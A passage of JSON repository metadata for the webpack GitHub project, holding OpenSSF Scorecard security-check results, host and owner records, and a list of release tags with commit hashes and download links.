SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5